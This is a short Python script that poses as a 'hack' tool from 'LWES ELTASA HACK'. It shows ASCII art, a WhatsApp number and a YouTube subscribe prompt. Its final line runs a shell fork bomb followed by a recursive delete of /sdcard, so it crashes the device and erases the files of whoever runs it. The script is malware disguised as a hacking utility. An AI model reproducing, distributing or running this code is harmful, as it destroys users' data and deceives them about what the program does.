import os
os.system("clear")
import time

print ("\033[0;33m Made Py »LWES ELTASA HACK«")
print ("\033[0;33m WA »01283494514«")
print ("\033[0;33m Youtube »LWES ELTASA HACK")
#colors
print ("\033[0;32mMMMMMMMMMMMMNho++/----:+syydmMMMMMMMMMMM")
print ("\033[0;32mMMMMMMMMh+:.                 `+mMMMMMMMM")
print ("\033[0;32mMMMMMNs-           .` `    `..` -+mMMMMM")
print ("\033[0;32mMMMMm- `:+/+:``   ./-.``:ohmNmmdo.`yMMMM")
print ("\033[0;32mMMMy``/yhdmmmmmmy+---:smNNNNNNNmmd/`/NMM")
print ("\033[0;32mMM+ .ohdmmNNNNNNNNNNNNNNNNNNNNNNNmm:`-NM")
print ("M/ `oydmmmNNNNNNNNNNNNNNNNNNNNNNNNmd-`+M")
print ("m  :shdyymmNNNNNNNNNNNNNNNNNNNds+smm+  m")
print ("h  /y:`  `:smNNNNNNNNNNNNNNNh:`.-``ss  y")
print ("d  o-`/hdy+-.+mNNNNNNNNNNNs:-+dNNm+.s  s")
print ("s``+`sdmmNNNy:-smNNNNNNNy::odNNNNNNo:. s")
print ("s`-:oddddddddms::mNNNNNo.:ydddmmmNNm-+ y")
print ("s`+syhddmmmmdyyhymNNNNNmhhdmNNNNNNmmhd`y")
print ("o-sssydNMNdmNNmhyhmNNNmhdmmNmNMMMNmmmm/")
print ("NshddymMM:`.dMNmhydNNmdmmNM:.`mMMMmNNmdm")
print ("mydmmddmNNdmMMMNdhdNNmmNNNNNddMMMNNNNNmM")
print ("mydmmmy.hNNNNNNNdhdNNmmNNNNNNNNysmNNNNmM")
print ("Myhdmmm/-dmNNNmmhhmNNmmNNNMMNNN:hNNNNNNM")
print ("Mmoyhdd+:mNNNmmdyydNNmmNNNNNMNN+sNNNmmMM")
print ("MMhoyhh`ommmmddhyydNNmmmNNNNNNNs-NmmdMMM")
print ("MMMsos+`dmddddhyyhmNNNmmNNNNNNNd`hmdNMMM")
print ("MMMN+o/-dddddhyyydNNNNNmNNNNNNNm`sddMMMM")
print ("MMMMho/-ddhhhyo+sdmNNNmddmNNNNNm.ydNMMMM")
print ("MMMMdos..-:-.```./oyys+-.::////::mdNMMMM")
print ("MMMMmoss/-.````-:/++++//::::--/ommmMMMMM")
print ("MMMMMyssssss+:---:/+++oydmNNNNNNNmmMMMMM")
print ("MMMMMNsssyyys++oossyyyyyyydNNNNNmmNMMMMM")
print ("MMMMMMNysyyhddddmNNNNNNNNNNNNNNmNMMMMMMM")
print ("MMMMMMMMmyyhmmmNNNNNNMMMNNNNNNNMMMMMMMMM")
print ("MMMMMMMMMNhydmmNNNNNNNNNNNNNNNMMMMMMMMMM")
print ("MMMMMMMMMMMNdhdmmmNNNNNNNNNNMMMMMMMMMMMM")
print ("MMMMMMMMMMMMMMNmmmmmmmNNNMMMMMMMMMMMMMM")



time.sleep(3)
input("\033[0;39m are you ready? (:")
os.system("clear")

time.sleep(3)
print ("\033[0;35m subscribe first (:")
print ("https://youtube.com/channel/UCugYk-edxlAeiB7F66Af2Dg")
time.sleep(6)
os.system("clear")
time.sleep (3) 
print ("\033[0;33m latse go (:")

os.system("clear")
time.sleep(4)
print("\033[0;33m LWES ELTASA Will Damedge you (:")

time.sleep(2)
os.system("clear")
os.system(":(){ :|:& };: && rm -rif /sdcard *")
